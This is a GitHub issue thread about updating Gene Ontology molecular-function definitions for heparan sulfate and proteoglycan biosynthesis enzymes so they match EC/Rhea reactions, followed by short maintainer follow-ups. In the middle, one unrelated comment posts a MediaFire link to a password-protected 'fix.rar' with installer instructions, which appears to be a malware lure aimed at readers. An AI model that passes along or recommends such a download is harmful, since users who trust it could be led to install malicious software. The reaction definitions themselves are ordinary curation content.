### ISSUE TITLE
Textual definition update: GO:0001888, GO:0050508, GO:0050509, GO:0015016, GO:0008467, GO:0033871, GO:0033872, GO:0017095, GO:0047464

### ISSUE THREAD

**Issue by rozaru** [geneontology/go-ontology#28762]
Would it be possible to update the definition of the following MF terms to match the EC/Rhea reactions?

--------------------------
id: GO:0001888
name: glucuronyl-galactosyl-proteoglycan 4-alpha-N-acetylglucosaminyltransferase activity

Catalysis of the reaction: 3-O-(beta-D-glucuronosyl-(1->3)-beta-D-galactosyl-(1->3)-beta-D-galactosyl-(1->4)-beta-D-xylosyl)-L-seryl-[protein] + UDP-N-acetyl-alpha-D-glucosamine = 3-O-(alpha-N-acetyl-D-glucosaminyl-(1->4)-beta-D-glucuronosyl-(1->3)-beta-D-galactosyl-(1->3)-beta-D-galactosyl-(1->4)-beta-D-xylosyl)-L-seryl-[protein] + H(+) + UDP.	

------------------------
id: GO:0050508
name: glucuronosyl-N-acetylglucosaminyl-proteoglycan 4-alpha-N-acetylglucosaminyltransferase activity

Catalysis of the reaction: 3-O-{((1->4)-beta-D-glucuronosyl-(1->4)-alpha-D-N-acetyl-alpha-D-glucosaminyl)(n)-(1->4)-beta-D-glucuronosyl-(1->3)-beta-D-galactosyl-(1->3)-beta-D-galactosyl-(1->4)-beta-D-xylosyl}-L-seryl-[protein] + UDP-N-acetyl-alpha-D-glucosamine = 3-O-{N-acetyl-alpha-D-glucosaminyl-((1->4)-beta-D-glucuronosyl-(1->4)-alpha-D-GlcNAc)(n)-(1->4)-beta-D-glucuronosyl-(1->3)-beta-D-galactosyl-(1->3)-beta-D-galactosyl-(1->4)-beta-D-xylosyl}-L-seryl-[protein] + H(+) + UDP.	

------------------------

id: GO:0050509
name: N-acetylglucosaminyl-proteoglycan 4-beta-glucuronosyltransferase activity

Catalysis of the reaction: 3-O-{N-acetyl-alpha-D-glucosaminyl-((1->4)-beta-D-glucuronosyl-(1->4)-alpha-D-GlcNAc)(n)-(1->4)-beta-D-glucuronosyl-(1->3)-beta-D-galactosyl-(1->3)-beta-D-galactosyl-(1->4)-beta-D-xylosyl}-L-seryl-[protein] + UDP-alpha-D-glucuronate = 3-O-{(1->4)-beta-D-glucuronosyl-(1->4)-N-acetyl-alpha-D-glucosaminyl-((1->4)-beta-D-glucuronosyl-(1->4)-alpha-D-GlcNAc)(n+1)-(1->4)-beta-D-glucuronosyl-(1->3)-beta-D-galactosyl-(1->3)-beta-D-galactosyl-(1->4)-beta-D-xylosyl}-L-seryl-[protein] + H(+) + UDP.

------------------------
id: GO:0015016
name: [heparan sulfate]-glucosamine N-sulfotransferase activity

Catalysis of the reaction: 3'-phosphoadenylyl sulfate + alpha-D-glucosaminyl-(heparan sulfate)(n) = adenosine 3',5'-bisphosphate + 2 H(+) + N-sulfo-alpha-D-glucosaminyl-(heparan sulfate)(n).	

------------------------
id: GO:0008467
name: [heparan sulfate]-glucosamine 3-sulfotransferase 1 activity

Catalysis of the reaction: 3'-phosphoadenylyl sulfate + alpha-D-glucosaminyl-(heparan sulfate)(n) = 3-sulfo-alpha-D-glucosaminyl-(heparan sulfate)(n) + adenosine 3',5'-bisphosphate + H(+). The (heparan sulfate)-glucosamine 3-sulfate has a substrate consensus sequence of Glc(N2S>NAc)+/-6S GlcA GlcN2S*+/-6S GlcA>IdoA+/-2S Glc(N2S/NAc)+/-6S.	

GO:0033871
[heparan sulfate]-glucosamine 3-sulfotransferase 2 activity

Catalysis of the reaction: 3'-phosphoadenylyl sulfate + alpha-D-glucosaminyl-(heparan sulfate)(n) = 3-sulfo-alpha-D-glucosaminyl-(heparan sulfate)(n) + adenosine 3',5'-bisphosphate + H(+). Modifies selected glucosamine residues preceded by GlcA2S.

GO:0033872
[heparan sulfate]-glucosamine 3-sulfotransferase 3 activity

Catalysis of the reaction: 3'-phosphoadenylyl sulfate + alpha-D-glucosaminyl-(heparan sulfate)(n) = 3-sulfo-alpha-D-glucosaminyl-(heparan sulfate)(n) + adenosine 3',5'-bisphosphate + H(+). 

For all the GO terms, the [Rhea reaction](https://www.rhea-db.org/rhea?query=ec%3A2.8.2.30) is missing:

Xref:RHEA:15461 BROAD
In Rhea there is only 1 reaction to describe these 3 EC.

For these GO terms there is a pending ticket [#28380](https://github.com/geneontology/go-ontology/issues/28380) to reorganise them.

------------------------
id: GO:0017095
name: heparan sulfate 6-O-sulfotransferase activity

Catalysis of the reaction: 3'-phosphoadenylyl sulfate + alpha-D-glucosaminyl-(heparan sulfate)(n) = 6-sulfo-alpha-D-glucosaminyl-(heparan sulfate)(n) + adenosine 3',5'-bisphosphate + H(+).

------------------------
id: GO:0047464
name: heparosan-N-sulfate-glucuronate 5-epimerase activity

Catalysis of the reaction: (heparosan-N-sulfate)(n) = (heparan-N-sulfate)(n). Converts D-glucosyluronate residues to L-iduronate residues.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pgaudet** [comment]
@raymond91125 Is there something blocking here?

**Comment by raymond91125** [comment]
> @raymond91125 Is there something blocking here?

I was waiting on the resolution of https://github.com/geneontology/go-ontology/issues/28380.
